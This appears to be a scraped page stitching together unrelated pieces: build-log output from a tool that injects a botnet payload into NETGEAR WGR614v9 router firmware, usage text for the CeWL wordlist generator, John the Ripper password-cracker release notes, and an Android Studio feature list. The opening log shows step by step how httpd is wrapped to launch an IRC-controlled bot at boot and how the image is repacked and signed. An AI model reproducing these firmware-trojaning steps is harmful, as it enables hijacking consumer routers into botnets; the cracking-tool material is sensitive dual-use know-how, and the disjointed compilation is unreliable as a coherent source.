Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
Step 6: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 1442.99 Kbytes (1.41 Mbytes)
29.38% of uncompressed filesystem size (4912.18 Kbytes)
Inode table size 2245 bytes (2.19 Kbytes)
33.63% of uncompressed inode table size (6675 bytes)
Directory table size 2322 bytes (2.27 Kbytes)
55.26% of uncompressed directory table size (4202 bytes)
Number of duplicate files found 3
Number of inodes 293
Number of files 218
Number of fragments 22
Number of symbolic links 48
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 27
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpOaw1tn/


CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Usage
cewl [OPTION] ... URL
--help, -h
Show help
--depth x, -d x
The depth to spider to, default 2
--min_word_length, -m
The minimum word length, this strips out all words under the specified length, default 3
--offsite, -o
By default, the spider will only visit the site specified. With this option it will also visit external sites
--write, -w file
Write the ouput to the file rather than to stdout
--ua, -u user-agent
Change the user agent
-v
Verbose, show debug and extra output
--no-words, -n
Don't output the wordlist
--meta, -a file
Include meta data, optional output file
--email, -e file
Include email addresses, optional output file
--meta_file file
Filename for metadata output
--email_file file
Filename for email output
--meta-temp-dir directory
The directory used used by exiftool when parsing files, the default is /tmp
--count, -c:
Show the count for each of the words found
--auth_type
Digest or basic
--auth_user
Authentication username
--auth_pass
Authentication password
--proxy_host
Proxy host
--proxy_port
Proxy port, default 8080
--proxy_username
Username for proxy, if required
--proxy_password
Password for proxy, if required
--verbose, -v
Verbose
URL
The site to spider.


Change Log
Keeping track of history.
  • Version 4.3 - Various spider bug fixes and the introduction of the sorting the results by count
  • Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
  • Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
  • Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
  • Version 3 - Now spiders pages referenced in JavaScript location commands
  • Version 2.2 - Data from email addresses and meta data can be written to their own files
  • Version 2.1 - Fixed a bug some people were having while using the email option
  • Version 2 - Added meta data support
  • Version 1 - released

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker


John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven’t been doing that during development, and it’d be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we’ve got. (Of course, there are the many commit messages -but that’s not a summary.)

A really brief summary, though, is that there are new “formats” (meaning more supported hash and “non-hash” types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0’s features (including –fork and –node). And new bugs. Oh, and we’re now using autoconf, meaning that you need to “./configure” and “make”, with all the usual pros and cons of this approach. There’s a Makefile.legacy included, so you may “make -f Makefile.legacy” to try and build JtR the old way if you refuse to use autoconf… for now…and this _might_ even work… but you’d better bite the bullet. (BTW, I have no current plans on autoconf’ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. “./configure –disable-openmp” or “./configure –disable-openmp-for-fast-formats” and run with –fork to achieve a higher cumulative c/s rate across the fork’ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).


Android Studio - The official Android IDE


Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:
  • Flexible Gradle-based build system
  • Build variants and multiple apk file generation
  • Code templates to help you build common app features
  • Rich layout editor with support for drag and drop theme editing
  • Lint tools to catch performance, usability, version compatibility, and other problems
  • ProGuard and app-signing capabilities
  • Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
  • And much more

Intelligent code editor
At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.
The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration
New project wizards make it easier than ever to start a new project.
Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development
Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.
With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes
Android Studio comes pre-configured with an optimized emulator image.
The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle
Create multiple APKs for your Android app with different features using the same project.
Manage app dependencies with Maven.
Build APKs from Android Studio or the command line.